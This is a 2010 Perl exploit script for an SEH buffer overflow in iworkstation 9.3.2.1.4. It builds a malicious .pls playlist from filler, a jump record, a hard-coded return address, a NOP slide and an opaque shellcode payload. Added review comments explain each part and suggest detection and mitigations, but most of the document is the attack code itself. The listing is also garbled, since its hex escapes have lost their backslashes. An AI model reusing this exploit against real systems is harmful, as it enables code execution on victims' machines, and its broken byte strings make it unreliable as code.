
# Title : iworkstation Version 9.3.2.1.4 seh exploit
# Published : 2010-09-27
# Author : sanjeev gupta


#iworkstation Version 9.3.2.1.4 seh exploit
#Author Sanjeev Gupta san.gupta86[at]gmail.com
#Download Vulnerable application from http://www.sharewareplaza.com/iworkstation-downloads_68989.html
#Vulnerable version iworkstation Version 9.3.2.1.4
#Tested on XP SP2
#Greets Puneet Jain


# Review notes (defensive reading of this listing)
#
# The script concatenates several strings into one oversized "File1=" entry
# and writes the result to POC.pls. Nothing here talks to the target
# application; it only produces a file.
#
# NOTE(review): as displayed, none of the "xNN" sequences carry a backslash,
# so Perl treats them as ordinary characters ('x', '4', '1', ...) rather than
# byte escapes. The listing appears to have lost its backslashes in
# extraction. The comments below describe what each piece would be if the
# sequences are read as hex byte values.
#
# Detection idea: a playlist whose File1 value is far longer than any real
# path or URL (here the trailing padding alone is 20000 repetitions) and
# contains non-printable bytes is a reliable indicator for this class of file.
# Mitigation belongs in the parser (bounded copy of playlist entries) and in
# the build/OS hardening the title refers to: stack cookies, SafeSEH/SEHOP,
# DEP and ASLR.

# Read as hex bytes this is "[playlist]" CR LF "File1=", i.e. the start of a
# PLS playlist with the first entry left open for the data that follows.
my $head = "x5Bx70x6Cx61x79x6Cx69x73x74x5Dx0Dx0Ax46x69x6Cx65x31x3D";
# Filler: the string repeated 260 times (0x41 is 'A' when read as a byte).
# presumably sized to reach the exception-handler record - TODO confirm
my $buff = "x41" x 260;
# Four bytes placed directly before the address below. Read as hex, EB 06 is
# an x86 short jump and 90 is NOP.
my $buff1= "xebx06x90x90";
# 32-bit little-endian ('V') hard-coded address. The author's comment labels
# the instruction found there; the owning module is not named on this page.
# NOTE(review): a fixed address only holds where that module loads at the
# same base - presumably the XP SP2 system named in the header.
my $buff2 = pack('V',0x73421DEF);                          #73421DEF   5E               POP ESI

# Twelve repetitions of the 0x90 (NOP) pattern ahead of the payload.
my $slide = "x90" x 12;
# Opaque payload bytes supplied by the author. Nothing on this page states
# what they do, so no behaviour is claimed for them here.
my $code =
"xDBxDFxD9x74x24xF4x58x2BxC9xB1x33xBA".
"x4CxA8x75x76x83xC0x04x31x50x13x03x1CxBBx97x83x60".
"x53xDEx6Cx98xA4x81xE5x7Dx95x93x92xF6x84x23xD0x5A".
"x25xCFxB4x4ExBExBDx10x61x77x0Bx47x4Cx88xBDx47x02".
"x4AxDFx3Bx58x9Fx3Fx05x93xD2x3Ex42xC9x1Dx12x1Bx86".
"x8Cx83x28xDAx0CxA5xFEx51x2CxDDx7BxA5xD9x57x85xF5".
"x72xE3xCDxEDxF9xABxEDx0Cx2DxA8xD2x47x5Ax1BxA0x56".
"x8Ax55x49x69xF2x3Ax74x46xFFx43xB0x60xE0x31xCAx93".
"x9Dx41x09xEEx79xC7x8Cx48x09x7Fx75x69xDExE6xFEx65".
"xABx6Dx58x69x2AxA1xD2x95xA7x44x35x1CxF3x62x91x45".
"xA7x0Bx80x23x06x33xD2x8BxF7x91x98x39xE3xA0xC2x57".
"xF2x21x79x1ExF4x39x82x30x9Dx08x09xDFxDAx94xD8xA4".
"x05x77xC9xD0xADx2Ex98x59xB0xD0x76x9DxCDx52x73x5D".
"x2Ax4AxF6x58x76xCCxEAx10xE7xB9x0Cx87x08xE8x6Ex46".
"x9Bx70x5FxEDx1Bx12x9F";



# Trailing padding: 20000 repetitions appended after the payload.
# presumably there to push the entry well past the end of the buffer - TODO confirm
my $buff4 = "x90" x 20000;
# Output file name; the .pls extension matches the playlist header in $head.
my $file = "POC.pls";

# NOTE(review): two-argument open with the mode interpolated into the name,
# an undeclared package-global handle ($File), no check of open's return
# value and no binmode on the handle. A failed open goes unnoticed and the
# print below then writes nothing.
open ($File,">$file");
# Write all pieces in order: header, filler, 4-byte field, address, slide,
# payload, trailing padding.
print  $File $head.$buff.$buff1.$buff2.$slide.$code.$buff4;
# close's return value is not checked either.
close($File)